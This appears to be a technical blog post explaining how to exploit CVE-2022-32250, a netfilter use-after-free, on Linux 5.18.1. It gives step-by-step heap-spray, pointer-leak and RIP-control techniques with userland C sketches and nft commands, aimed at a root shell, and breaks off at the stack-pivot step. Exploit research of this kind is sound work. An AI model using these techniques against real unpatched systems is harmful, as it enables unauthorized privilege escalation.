    It’s been a while since our last technical blogpost, so here’s one right on time for the Christmas holidays. We describe a method to exploit a use-after-free in the Linux kernel when objects are allocated in a specific slab cache, namely the kmalloc-cg series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.

    The use-after-free vulnerability in the Linux kernel netfilter subsystem was discovered by NCC Group’s Exploit Development Group (EDG). They published a very detailed write-up with an in-depth analysis of the vulnerability and an exploitation strategy that targeted Linux Kernel version 5.13. Additionally, Theori published their own analysis and exploitation strategy, this time targeting Linux Kernel version 5.15. We strongly recommend having a thorough read of both articles to better understand the vulnerability prior to reading this post, which almost exclusively focuses on an exploitation strategy that works on the latest vulnerable version of the Linux kernel, version 5.18.1.

    The aforementioned exploitation strategies are different from each other and from the one detailed here since the targeted kernel versions have different peculiarities. In version 5.13, allocations performed with either the GFP_KERNEL flag or the GFP_KERNEL_ACCOUNT flag are served by the kmalloc-* slab caches. In version 5.15, allocations performed with the GFP_KERNEL_ACCOUNT flag are served by the kmalloc-cg-* slab caches. While in both 5.13 and 5.15 the affected object, nft_expr, is allocated using GFP_KERNEL, the difference in exploitation between them arises because a commonly used heap spraying object, the System V message structure (struct msg_msg), is served from kmalloc-* in 5.13 but from kmalloc-cg-* in 5.15. Therefore, in 5.15, struct msg_msg cannot be used to exploit this vulnerability.

    In 5.18.1, the object involved in the use-after-free vulnerability, nft_expr, is itself allocated with GFP_KERNEL_ACCOUNT in the kmalloc-cg-* slab caches. Since the exploitation strategies presented by the NCC Group and Theori rely on objects allocated with  GFP_KERNEL, they do not work against the latest vulnerable version of the Linux kernel.

    The subject of this blog post is to present a strategy that works on the latest vulnerable version of the Linux kernel.

    Vulnerability

    Netfilter sets can be created with a maximum of two associated expressions that have the NFT_EXPR_STATEFUL flag. The vulnerability occurs when a set is created with an associated expression that does not have the NFT_EXPR_STATEFUL flag, such as the dynset and lookup expressions. These two expressions have a reference to another set for updating and performing lookups, respectively. Additionally, to enable tracking, each set has a bindings list that specifies the objects that have a reference to them.

    During the allocation of the associated dynset or lookup expression objects, references to the objects are added to the bindings list of the referenced set. However, when the expression associated to the set does not have the NFT_EXPR_STATEFUL flag, the creation is aborted and the allocated expression is destroyed. The problem occurs during the destruction process where the bindings list of the referenced set is not updated to remove the reference, effectively leaving a dangling pointer to the freed expression object. Whenever the set containing the dangling pointer in its bindings list is referenced again and its bindings list has to be updated, a use-after-free condition occurs.

    Exploitation

    Before jumping straight into exploitation details, first let’s see the definition of the structures involved in the vulnerability: nft_set, nft_expr, nft_lookup, and nft_dynset.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L502
    
    struct nft_set {
            struct list_head           list;                 /*     0    16 */
            struct list_head           bindings;             /*    16    16 */
            struct nft_table *         table;                /*    32     8 */
            possible_net_t             net;                  /*    40     8 */
            char *                     name;                 /*    48     8 */
            u64                        handle;               /*    56     8 */
            /* --- cacheline 1 boundary (64 bytes) --- */
            u32                        ktype;                /*    64     4 */
            u32                        dtype;                /*    68     4 */
            u32                        objtype;              /*    72     4 */
            u32                        size;                 /*    76     4 */
            u8                         field_len[16];        /*    80    16 */
            u8                         field_count;          /*    96     1 */
    
            /* XXX 3 bytes hole, try to pack */
    
            u32                        use;                  /*   100     4 */
            atomic_t                   nelems;               /*   104     4 */
            u32                        ndeact;               /*   108     4 */
            u64                        timeout;              /*   112     8 */
            u32                        gc_int;               /*   120     4 */
            u16                        policy;               /*   124     2 */
            u16                        udlen;                /*   126     2 */
            /* --- cacheline 2 boundary (128 bytes) --- */
            unsigned char *            udata;                /*   128     8 */
    
            /* XXX 56 bytes hole, try to pack */
    
            /* --- cacheline 3 boundary (192 bytes) --- */
            const struct nft_set_ops  * ops __attribute__((__aligned__(64))); /*   192     8 */
            u16                        flags:14;             /*   200: 0  2 */
            u16                        genmask:2;            /*   200:14  2 */
            u8                         klen;                 /*   202     1 */
            u8                         dlen;                 /*   203     1 */
            u8                         num_exprs;            /*   204     1 */
    
            /* XXX 3 bytes hole, try to pack */
    
            struct nft_expr *          exprs[2];             /*   208    16 */
            struct list_head           catchall_list;        /*   224    16 */
            unsigned char              data[] __attribute__((__aligned__(8))); /*   240     0 */
    
            /* size: 256, cachelines: 4, members: 29 */
            /* sum members: 176, holes: 3, sum holes: 62 */
            /* sum bitfield members: 16 bits (2 bytes) */
            /* padding: 16 */
            /* forced alignments: 2, forced holes: 1, sum forced holes: 56 */
    } __attribute__((__aligned__(64)));

    The nft_set structure represents an nftables set, a built-in generic infrastructure of nftables that allows using any supported selector to build sets, which makes possible the representation of maps and verdict maps (check the corresponding nftables wiki entry for more details).

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L347
    
    /**
     *	struct nft_expr - nf_tables expression
     *
     *	@ops: expression ops
     *	@data: expression private data
     */
    struct nft_expr {
    	const struct nft_expr_ops	*ops;
    	unsigned char			data[]
    		__attribute__((aligned(__alignof__(u64))));
    };

    The nft_expr structure is a generic container for expressions. The specific expression data is stored within its data member. For this particular vulnerability the relevant expressions are nft_lookup and nft_dynset, which are used to perform lookups on sets or update dynamic sets respectively.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nft_lookup.c#L18
    
    struct nft_lookup {
            struct nft_set *           set;                  /*     0     8 */
            u8                         sreg;                 /*     8     1 */
            u8                         dreg;                 /*     9     1 */
            bool                       invert;               /*    10     1 */
    
            /* XXX 5 bytes hole, try to pack */
    
            struct nft_set_binding     binding;              /*    16    32 */
    
            /* XXX last struct has 4 bytes of padding */
    
            /* size: 48, cachelines: 1, members: 5 */
            /* sum members: 43, holes: 1, sum holes: 5 */
            /* paddings: 1, sum paddings: 4 */
            /* last cacheline: 48 bytes */
    };

    nft_lookup expressions have to be bound to a given set on which the lookup operations are performed.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nft_dynset.c#L15
    
    struct nft_dynset {
            struct nft_set *           set;                  /*     0     8 */
            struct nft_set_ext_tmpl    tmpl;                 /*     8    12 */
    
            /* XXX last struct has 1 byte of padding */
    
            enum nft_dynset_ops        op:8;                 /*    20: 0  4 */
    
            /* Bitfield combined with next fields */
    
            u8                         sreg_key;             /*    21     1 */
            u8                         sreg_data;            /*    22     1 */
            bool                       invert;               /*    23     1 */
            bool                       expr;                 /*    24     1 */
            u8                         num_exprs;            /*    25     1 */
    
            /* XXX 6 bytes hole, try to pack */
    
            u64                        timeout;              /*    32     8 */
            struct nft_expr *          expr_array[2];        /*    40    16 */
            struct nft_set_binding     binding;              /*    56    32 */
    
            /* XXX last struct has 4 bytes of padding */
    
            /* size: 88, cachelines: 2, members: 11 */
            /* sum members: 81, holes: 1, sum holes: 6 */
            /* sum bitfield members: 8 bits (1 bytes) */
            /* paddings: 2, sum paddings: 5 */
            /* last cacheline: 24 bytes */
    };

    nft_dynset expressions have to be bound to a given set on which the add, delete, or update operations will be performed.

    When a given nft_set has expressions bound to it, they are added to the nft_set.bindings double linked list. A visual representation of an nft_set with 2 expressions is shown in the diagram below.

    The binding member of the nft_lookup and nft_dynset expressions is defined as follows:

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L576
    
    /**
     *	struct nft_set_binding - nf_tables set binding
     *
     *	@list: set bindings list node
     *	@chain: chain containing the rule bound to the set
     *	@flags: set action flags
     *
     *	A set binding contains all information necessary for validation
     *	of new elements added to a bound set.
     */
    struct nft_set_binding {
    	struct list_head		list;
    	const struct nft_chain		*chain;
    	u32				flags;
    };

    The important member in our case is the list member. It is of type struct list_head, the same as the nft_lookup.binding and nft_dynset.binding members. These are the foundation for building a doubly linked list in the kernel. For more details on how linked lists in the Linux kernel are implemented refer to this article.

    With this information, let’s see what the vulnerability allows us to do. Since the UAF occurs within a doubly linked list, let’s review the common operations on them and what that implies in our scenario. Instead of showing a generic example, we are going to use the linked list that is built with the nft_set and the expressions that can be bound to it.

    In the diagram shown above, the simplified pseudo-code for removing the nft_lookup expression from the list would be:

    nft_lookup.binding.list->prev->next = nft_lookup.binding.list->next
    nft_lookup.binding.list->next->prev = nft_lookup.binding.list->prev

    This code effectively writes the address of nft_dynset.binding into nft_set.bindings.next, and the address of nft_set.bindings into nft_dynset.binding.list->prev. Since the binding member of the nft_lookup and nft_dynset expressions is defined at a different offset within each structure, the write operation occurs at different offsets depending on which expression is removed.
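
    For reference, these are exactly the two pointer writes performed by the kernel's generic list unlink helper:

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/list.h

    /*
     * Delete a list entry by making the prev/next entries
     * point to each other.
     */
    static inline void __list_del(struct list_head * prev, struct list_head * next)
    {
            next->prev = prev;
            WRITE_ONCE(prev->next, next);
    }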

    With this out of the way we can now list the write primitives that this vulnerability allows, depending on which expression is the vulnerable one:

    • nft_lookup: Write an 8-byte address at offset 24 (binding.list->next) or offset 32 (binding.list->prev) of a freed nft_lookup object.
    • nft_dynset: Write an 8-byte address at offset 64 (binding.list->next) or offset 72 (binding.list->prev) of a freed nft_dynset object.

    The offsets mentioned above take into account the fact that nft_lookup and nft_dynset expressions are bundled in the data member of an nft_expr object (the data member is at offset 8).

    In order to do something useful with the limited write primitives that the vulnerability offers, we need to find objects allocated within the same slab caches as the nft_lookup and nft_dynset expression objects that have an interesting member at the listed offsets.

    As mentioned before, in Linux kernel 5.18.1 the nft_expr objects are allocated using the GFP_KERNEL_ACCOUNT flag, as shown below.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nf_tables_api.c#L2866
    
    static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
    				      const struct nlattr *nla)
    {
    	struct nft_expr_info expr_info;
    	struct nft_expr *expr;
    	struct module *owner;
    	int err;
    
    	err = nf_tables_expr_parse(ctx, nla, &expr_info);
    	if (err < 0)
                goto err1;
            err = -ENOMEM;
    
            expr = kzalloc(expr_info.ops->size, GFP_KERNEL_ACCOUNT);
    	if (expr == NULL)
    	    goto err2;
    
    	err = nf_tables_newexpr(ctx, &expr_info, expr);
    	if (err < 0)
                goto err3;
    
            return expr;
    err3:
            kfree(expr);
    err2:
            owner = expr_info.ops->type->owner;
    	if (expr_info.ops->type->release_ops)
    	    expr_info.ops->type->release_ops(expr_info.ops);
    
    	module_put(owner);
    err1:
    	return ERR_PTR(err);
    }

    Therefore, the objects suitable for exploitation will be different from those used in the publicly available exploits targeting versions 5.13 and 5.15.

    Exploit Strategy

    The ultimate primitives we need to exploit this vulnerability are the following:

    • Memory leak primitive: Mainly to defeat KASLR.
    • RIP control primitive: To achieve kernel code execution and escalate privileges.

    However, neither of these can be achieved by only using the 8-byte write primitive that the vulnerability offers. The 8-byte write primitive on a freed object can be used to corrupt the object replacing the freed allocation. This can be leveraged to force a partial free of either the nft_set, nft_lookup, or nft_dynset objects.

    Partially freeing nft_lookup and nft_dynset objects can help with leaking pointers, while partially freeing an nft_set object can be pretty useful to craft a partial fake nft_set to achieve RIP control, since it has an ops member that points to a function table.

    Therefore, the high-level exploitation strategy would be the following:

    1. Leak the kernel image base address.
    2. Leak a pointer to an nft_set object.
    3. Obtain RIP control.
    4. Escalate privileges by overwriting the kernel’s MODPROBE_PATH global variable.
    5. Return execution to userland and drop a root shell.

    The following sub-sections describe how this can be achieved.

    Partial Object Free Primitive

    A partial object free primitive can be built by looking for a kernel object allocated with GFP_KERNEL_ACCOUNT within kmalloc-cg-64 or kmalloc-cg-96, with a pointer at offsets 24 or 32 for kmalloc-cg-64 or at offsets 64 and 72 for kmalloc-cg-96. Afterwards, when the object of interest is destroyed, kfree() has to be called on that pointer in order to partially free the targeted object.

    One of such objects is the fdtable object, which is meant to hold the file descriptor table for a given process. Its definition is shown below.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/fdtable.h#L27
    
    struct fdtable {
            unsigned int               max_fds;              /*     0     4 */
    
            /* XXX 4 bytes hole, try to pack */
    
            struct file * *            fd;                   /*     8     8 */
            long unsigned int *        close_on_exec;        /*    16     8 */
            long unsigned int *        open_fds;             /*    24     8 */
            long unsigned int *        full_fds_bits;        /*    32     8 */
            struct callback_head       rcu __attribute__((__aligned__(8))); /*    40    16 */
    
            /* size: 56, cachelines: 1, members: 6 */
            /* sum members: 52, holes: 1, sum holes: 4 */
            /* forced alignments: 1 */
            /* last cacheline: 56 bytes */
    } __attribute__((__aligned__(8)));

    The size of an fdtable object is 56 bytes; it is allocated in the kmalloc-cg-64 slab cache and thus can be used to replace nft_lookup objects. It has a member of interest at offset 24 (open_fds), which is a pointer to an unsigned long integer array. The allocation of fdtable objects is done by the kernel function alloc_fdtable(), which can be reached with the following call stack:
    alloc_fdtable()
     |  
     +- dup_fd()
        |
        +- copy_files()
          |
          +- copy_process()
            |
            +- kernel_clone()
              |
              +- fork() syscall

    Therefore, calling the fork() system call copies the current process and thus its currently open files. This is done by allocating a new file descriptor table object (fdtable), if required, and copying the currently open file descriptors to it. The allocation of a new fdtable object only happens when the number of open file descriptors exceeds NR_OPEN_DEFAULT, which is defined as 64 on 64-bit machines. The following listing shows this check.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/fs/file.c#L316

    /*
     * Allocate a new files structure and copy contents from the
     * passed in files structure.
     * errorp will be valid only when the returned files_struct is NULL.
     */
    struct files_struct *dup_fd(struct files_struct *oldf, unsigned int max_fds, int *errorp)
    {
        struct files_struct *newf;
        struct file **old_fds, **new_fds;
        unsigned int open_files, i;
        struct fdtable *old_fdt, *new_fdt;

        *errorp = -ENOMEM;
        newf = kmem_cache_alloc(files_cachep, GFP_KERNEL);
        if (!newf)
            goto out;

        atomic_set(&newf->count, 1);

        spin_lock_init(&newf->file_lock);
        newf->resize_in_progress = false;
        init_waitqueue_head(&newf->resize_wait);
        newf->next_fd = 0;
        new_fdt = &newf->fdtab;
[1]     new_fdt->max_fds = NR_OPEN_DEFAULT;
        new_fdt->close_on_exec = newf->close_on_exec_init;
        new_fdt->open_fds = newf->open_fds_init;
        new_fdt->full_fds_bits = newf->full_fds_bits_init;
        new_fdt->fd = &newf->fd_array[0];

        spin_lock(&oldf->file_lock);
        old_fdt = files_fdtable(oldf);
        open_files = sane_fdtable_size(old_fdt, max_fds);

        /*
         * Check whether we need to allocate a larger fd array and fd set.
         */
[2]     while (unlikely(open_files > new_fdt->max_fds)) {
            spin_unlock(&oldf->file_lock);

            if (new_fdt != &newf->fdtab)
                __free_fdtable(new_fdt);

[3]         new_fdt = alloc_fdtable(open_files - 1);
            if (!new_fdt) {
                *errorp = -ENOMEM;
                goto out_release;
            }

            [Truncated]
        }

        [Truncated]

        return newf;

    out_release:
        kmem_cache_free(files_cachep, newf);
    out:
        return NULL;
    }

    At [1] the max_fds member of new_fdt is set to NR_OPEN_DEFAULT. Afterwards, at [2] the loop executes only when the number of open files exceeds the max_fds value. If the loop executes, at [3] a new fdtable object is allocated via the alloc_fdtable() function.

    Therefore, to force the allocation of fdtable objects in order to replace a given free object from kmalloc-cg-64 the following steps must be taken:

    1. Create more than 64 open file descriptors. This can be easily done by calling the dup() function to duplicate an existing file descriptor, such as stdout. This step should be done before triggering the free of the object to be replaced with an fdtable object, since the dup() system call also ends up allocating fdtable objects that can interfere.
    2. Once the target object has been freed, fork the current process a large number of times. Each fork() execution creates one fdtable object.

    The free of the open_fds pointer is triggered when the fdtable object is destroyed in the __free_fdtable() function.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/fs/file.c#L34

    static void __free_fdtable(struct fdtable *fdt)
    {
        kvfree(fdt->fd);
        kvfree(fdt->open_fds);
        kfree(fdt);
    }

    Therefore, the partial free via the overwritten open_fds pointer can be triggered by simply terminating the child process that allocated the fdtable object.
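
    The sequence above can be sketched in userland as follows. The fork count and the use of pause() in the children are illustrative assumptions, not the exploit's exact code.

    /*
     * Userland sketch of the fdtable spray and the partial free trigger.
     * Step 1: exceed NR_OPEN_DEFAULT (64) open descriptors via dup().
     * Step 2: fork() repeatedly so each child allocates an fdtable object
     *         in kmalloc-cg-64.
     * Killing the children later runs __free_fdtable(), which calls
     * kfree() on the (possibly corrupted) open_fds pointer.
     */
    #include <signal.h>
    #include <sys/types.h>
    #include <sys/wait.h>
    #include <unistd.h>

    #define N_FORKS 128   /* illustrative spray count */

    static pid_t children[N_FORKS];

    static void spray_fdtables(void)
    {
        for (int i = 0; i < 65; i++)          /* step 1: > NR_OPEN_DEFAULT */
            dup(STDOUT_FILENO);

        for (int i = 0; i < N_FORKS; i++) {   /* step 2: one fdtable per fork */
            pid_t pid = fork();
            if (pid == 0) {
                pause();                      /* child keeps its fdtable alive */
                _exit(0);
            }
            children[i] = pid;
        }
    }

    static void trigger_partial_free(void)
    {
        for (int i = 0; i < N_FORKS; i++) {
            kill(children[i], SIGKILL);       /* destroys the child's fdtable */
            waitpid(children[i], NULL, 0);
        }
    }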

    Leaking Pointers

    The exploit primitive provided by this vulnerability can be used to build a leaking primitive by overwriting the vulnerable object with an object that has an area that will be copied back to userland. One such object is the System V message represented by the msg_msg structure, which is allocated in kmalloc-cg-* slab caches starting from kernel version 5.14.

    The msg_msg structure acts as a header of System V messages that can be created via the userland msgsnd() function. The content of the message can be found right after the header within the same allocation. System V messages are a widely used exploit primitive for heap spraying.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/msg.h#L9

    struct msg_msg {
            struct list_head           m_list;               /*     0    16 */
            long int                   m_type;               /*    16     8 */
            size_t                     m_ts;                 /*    24     8 */
            struct msg_msgseg *        next;                 /*    32     8 */
            void *                     security;             /*    40     8 */

            /* size: 48, cachelines: 1, members: 5 */
            /* last cacheline: 48 bytes */
    };

    Since the size of the allocation for a System V message can be controlled, it is possible to allocate it in both kmalloc-cg-64 and kmalloc-cg-96 slab caches.

    It is important to note that any data to be leaked must be written past the first 48 bytes of the message allocation, otherwise it would overwrite the msg_msg header. This restriction rules out the nft_lookup object as a candidate for this technique, since the vulnerability only allows writing the pointer at offset 24 or offset 32 within that object. The ability to overwrite the msg_msg.m_ts member, which defines the size of the message, helps build a strong out-of-bounds read primitive if the value is large enough. However, there is a check in the code to ensure that m_ts is not negative when interpreted as a signed long integer, and heap addresses start with 0xffff, which makes them negative long integers.

    Leaking an nft_set Pointer

    Leaking a pointer to an nft_set object is quite simple with the memory leak primitive described above. The steps to achieve it are the following:

    1. Create a target set where the expressions will be bound to.

    2. Create a rule with a lookup expression bound to the target set from step 1.

    3. Create a set with an embedded nft_dynset expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the nft_dynset object will be freed but not removed from the target set bindings list, causing a UAF.

    4. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed nft_dynset object (via msgsnd() function). Tag all the messages at offset 24 so the one corrupted with the nft_set pointer can later be identified.

    5. Remove the rule created, which will remove the entry of the nft_lookup expression from the target set’s bindings list. Removing this from the list effectively writes a pointer to the target nft_set object where the original binding.list.prev member was (offset 72). Since the freed nft_dynset object was replaced by a System V message, the pointer to the nft_set will be written at offset 24 within the message data.

    6. Use the userland msgrcv() function to read the messages and check which one does not have the tag anymore, as it would have been replaced by the pointer to the nft_set.
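
    A minimal sketch of step 6, assuming the tag layout from the spray sketch above, could look as follows:

#include <stdint.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

/* Walk the sprayed messages and return the pointer that replaced the tag. */
static uint64_t find_leaked_nft_set(int msqid)
{
    struct {
        long mtype;
        char mtext[48];
    } msg;

    for (int i = 0; i < 512; i++) {
        if (msgrcv(msqid, &msg, sizeof(msg.mtext), 0, IPC_NOWAIT) < 0)
            break;

        /* The binding list unlink wrote the nft_set pointer at offset 24. */
        if (memcmp(msg.mtext + 24, "TAGTAGTA", 8) != 0) {
            uint64_t leak;
            memcpy(&leak, msg.mtext + 24, sizeof(leak));
            return leak;
        }
    }
    return 0;
}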

    Leaking a Kernel Function Pointer

    Leaking a kernel pointer requires a bit more work than leaking a pointer to an nft_set object. It requires being able to partially free objects within the target set bindings list as a means of crafting use-after-free conditions. This can be done with the partial object free primitive based on fdtable objects described earlier. The steps followed to leak a pointer to a kernel function are the following.

    1. Increase the number of open file descriptors by calling dup() on stdout 65 times.

    2. Create a target set where the expressions will be bound to (different from the one used in the `nft_set` address leak).

    3. Create a set with an embedded nft_lookup expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the nft_lookup object will be freed but not removed from the target set bindings list, causing a UAF.

    4. Spray fdtable objects in order to replace the freed nft_lookup from step 3.

    5. Create a set with an embedded nft_dynset expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the nft_dynset object will be freed but not removed from the target set bindings list, causing a UAF. This addition to the bindings list will write the pointer to its binding member into the open_fds member of the fdtable object (allocated in step 4) that replaced the nft_lookup object.

    6. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed nft_dynset object (via msgsnd() function). Tag all the messages at offset 8 so the one corrupted can be identified.

    7. Kill all the child processes created in step 4 in order to trigger the partial free of the System V message that replaced the nft_dynset object, effectively causing a UAF to a part of a System V message.

    8. Spray time_namespace objects in order to replace the System V message partially freed in step 7. The reason for using the time_namespace objects is explained later.

    9. Since the System V message header was not corrupted, find the System V message whose tag has been overwritten. Use msgrcv() to read the data from it, which overlaps with the newly allocated time_namespace object. Offset 40 of the data portion of the System V message corresponds to the time_namespace.ns->ops member, which points to a function table defined within the kernel core. Armed with this pointer and the knowledge of its offset from the kernel image base, it is possible to calculate the kernel image base address.

    10. Clean-up the child processes used to spray the time_namespace objects.
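
    Once the leaked ops pointer has been read out of the corrupted message in step 9, recovering the kernel image base is a single subtraction. The offset below is a placeholder that depends entirely on the target kernel build:

#include <stdint.h>

/* Placeholder: offset of the time namespace proc_ns_operations table from the
 * kernel image base, obtained from the target build's vmlinux/symbols. */
#define TIME_NS_OPS_OFFSET 0x1e4b2a0UL

static uint64_t kernel_base_from_leak(uint64_t leaked_ops_ptr)
{
    return leaked_ops_ptr - TIME_NS_OPS_OFFSET;
}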

    time_namespace objects are interesting because they contain an ns_common structure embedded in them, which in turn contains an ops member that points to a function table with functions defined within the kernel core. The time_namespace structure definition is listed below.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/time_namespace.h#L19

struct time_namespace {
	struct user_namespace *    user_ns;          /*  0  8 */
	struct ucounts *           ucounts;          /*  8  8 */
	struct ns_common           ns;               /* 16 24 */
	struct timens_offsets      offsets;          /* 40 32 */
	/* --- cacheline 1 boundary (64 bytes) was 8 bytes ago --- */
	struct page *              vvar_page;        /* 72  8 */
	bool                       frozen_offsets;   /* 80  1 */

	/* size: 88, cachelines: 2, members: 6 */
	/* padding: 7 */
	/* last cacheline: 24 bytes */
};

    At offset 16, the ns member is found. It is an ns_common structure, whose definition is the following.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/ns_common.h#L9

struct ns_common {
	atomic_long_t                          stashed;   /*  0 8 */
	const struct proc_ns_operations *      ops;       /*  8 8 */
	unsigned int                           inum;      /* 16 4 */
	refcount_t                             count;     /* 20 4 */

	/* size: 24, cachelines: 1, members: 4 */
	/* last cacheline: 24 bytes */
};

    At offset 8 within the ns_common structure the ops member is found. Therefore, time_namespace.ns->ops is at offset 24.

    Spraying time_namespace objects can be done by calling the unshare() system call and providing the CLONE_NEWUSER and CLONE_NEWTIME flags. In order to avoid altering the execution of the current process, the unshare() executions can be done in separate processes created via fork().

    unshare() syscall
      |
      +- unshare_nsproxy_namespaces()
           |
           +- create_new_namespaces()
                |
                +- copy_time_ns()
                     |
                     +- clone_time_ns()

    The CLONE_NEWTIME flag is required because of a check in the function copy_time_ns() (listed below) and CLONE_NEWUSER is required to be able to use the CLONE_NEWTIME flag from an unprivileged user.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/kernel/time/namespace.c#L133

/**
 * copy_time_ns - Create timens_for_children from @old_ns
 * @flags:	Cloning flags
 * @user_ns:	User namespace which owns a new namespace.
 * @old_ns:	Namespace to clone
 *
 * If CLONE_NEWTIME specified in @flags, creates a new timens_for_children;
 * adds a refcounter to @old_ns otherwise.
 *
 * Return: timens_for_children namespace or ERR_PTR.
 */
struct time_namespace *copy_time_ns(unsigned long flags,
	struct user_namespace *user_ns, struct time_namespace *old_ns)
{
	if (!(flags & CLONE_NEWTIME))
		return get_time_ns(old_ns);

	return clone_time_ns(user_ns, old_ns);
}
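
    A minimal sketch of the spray is shown below. The spray count and keeping each child alive with pause() are illustrative choices, not the exploit's exact behavior.

#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef CLONE_NEWTIME
#define CLONE_NEWTIME 0x00000080   /* not exposed by older libc headers */
#endif

#define N_TIMENS 64   /* assumed spray count */

static pid_t timens_pids[N_TIMENS];

/* Each child creates a timens_for_children namespace via clone_time_ns(),
 * allocating one time_namespace object in the kernel. */
static void spray_time_namespaces(void)
{
    for (int i = 0; i < N_TIMENS; i++) {
        pid_t pid = fork();
        if (pid == 0) {
            /* CLONE_NEWUSER lets an unprivileged user request CLONE_NEWTIME. */
            unshare(CLONE_NEWUSER | CLONE_NEWTIME);
            pause();   /* keep the time_namespace object alive */
            exit(0);
        }
        timens_pids[i] = pid;
    }
}

static void cleanup_time_namespaces(void)
{
    for (int i = 0; i < N_TIMENS; i++)
        kill(timens_pids[i], SIGKILL);
}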

    RIP Control

    Achieving RIP control is relatively easy with the partial object free primitive. This primitive can be used to partially free an nft_set object whose address is known and replace it with a fake nft_set object created with a System V message. The nft_set objects contain an ops member, which is a function table of type nft_set_ops. Crafting this function table and triggering the right call will lead to RIP control.

    The following is the definition of the nft_set_ops structure.

    // Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L389

struct nft_set_ops {
	bool   (*lookup)(const struct net *, const struct nft_set *, const u32 *, const struct nft_set_ext **);                                                                                   /*   0 8 */
	bool   (*update)(struct nft_set *, const u32 *, void * (*)(struct nft_set *, const struct nft_expr *, struct nft_regs *), const struct nft_expr *, struct nft_regs *, const struct nft_set_ext **);  /*   8 8 */
	bool   (*delete)(const struct nft_set *, const u32 *);                                                                                                                                     /*  16 8 */
	int    (*insert)(const struct net *, const struct nft_set *, const struct nft_set_elem *, struct nft_set_ext **);                                                                          /*  24 8 */
	void   (*activate)(const struct net *, const struct nft_set *, const struct nft_set_elem *);                                                                                               /*  32 8 */
	void * (*deactivate)(const struct net *, const struct nft_set *, const struct nft_set_elem *);                                                                                             /*  40 8 */
	bool   (*flush)(const struct net *, const struct nft_set *, void *);                                                                                                                       /*  48 8 */
	void   (*remove)(const struct net *, const struct nft_set *, const struct nft_set_elem *);                                                                                                 /*  56 8 */
	/* --- cacheline 1 boundary (64 bytes) --- */
	void   (*walk)(const struct nft_ctx *, struct nft_set *, struct nft_set_iter *);                                                                                                           /*  64 8 */
	void * (*get)(const struct net *, const struct nft_set *, const struct nft_set_elem *, unsigned int);                                                                                      /*  72 8 */
	u64    (*privsize)(const struct nlattr * const *, const struct nft_set_desc *);                                                                                                            /*  80 8 */
	bool   (*estimate)(const struct nft_set_desc *, u32, struct nft_set_estimate *);                                                                                                           /*  88 8 */
	int    (*init)(const struct nft_set *, const struct nft_set_desc *, const struct nlattr * const *);                                                                                        /*  96 8 */
	void   (*destroy)(const struct nft_set *);                                                                                                                                                 /* 104 8 */
	void   (*gc_init)(const struct nft_set *);                                                                                                                                                 /* 112 8 */
	unsigned int elemsize;                                                                                                                                                                     /* 120 4 */

	/* size: 128, cachelines: 2, members: 16 */
	/* padding: 4 */
};

    The delete member is executed when an item has to be removed from the set. The item removal can be done from a rule that removes an element from a set when certain criteria are matched. Using the nft command, a very simple example is the following:

    nft add table inet test_dynset
    nft add chain inet test_dynset my_input_chain { type filter hook input priority 0\;}
    nft add set inet test_dynset my_set { type ipv4_addr\; }
    nft add rule inet test_dynset my_input_chain ip saddr 127.0.0.1 delete @my_set { 127.0.0.1 }

    The snippet above shows the creation of a table, a chain, and a set that contains elements of type ipv4_addr (i.e. IPv4 addresses). Then a rule is added, which deletes the item 127.0.0.1 from the set my_set when an incoming packet has the source IPv4 address 127.0.0.1. Whenever a packet matching those criteria is processed via nftables, the delete function pointer of the specified set is called.

    Therefore, RIP control can be achieved with the following steps. Consider the target set to be the nft_set object whose address was already obtained.

    1. Add a rule to the table being used for exploitation in which an item is removed from the target set when the source IP of incoming packets is 127.0.0.1.
    2. Partially free the nft_set object from which the address was obtained.
    3. Spray System V messages containing a partially fake nft_set object containing a fake ops table, with a given value for the ops->delete member.
    4. Trigger the call of nft_set->ops->delete by locally sending a network packet to 127.0.0.1. This can be done by simply opening a TCP socket to 127.0.0.1 at any port and issuing a connect() call.
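
    A sketch of step 4 is shown below. The destination port is arbitrary and nothing needs to be listening: the generated loopback traffic is enough to traverse the input hook and match the rule.

#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

static void trigger_delete_hook(void)
{
    int sock = socket(AF_INET, SOCK_STREAM, 0);

    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_port   = htons(1337),   /* arbitrary port */
    };
    inet_pton(AF_INET, "127.0.0.1", &addr.sin_addr);

    /* The loopback packets match "ip saddr 127.0.0.1" in the rule above,
     * causing nftables to call the fake nft_set->ops->delete pointer. */
    connect(sock, (struct sockaddr *)&addr, sizeof(addr));
    close(sock);
}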

    Escalating Privileges

    Once the control of the RIP register is achieved and thus the code execution can be redirected, the last step is to escalate privileges of the current process and drop to an interactive shell with root privileges.

    A way of achieving this is as follows:

    1. Pivot the stack to a memory area under control. When the delete function is called, the RSI register contains the address of the memory region where the nftables register values are stored. The values of such registers can be controlled by adding an immediate expression in the rule created to achieve RIP control.
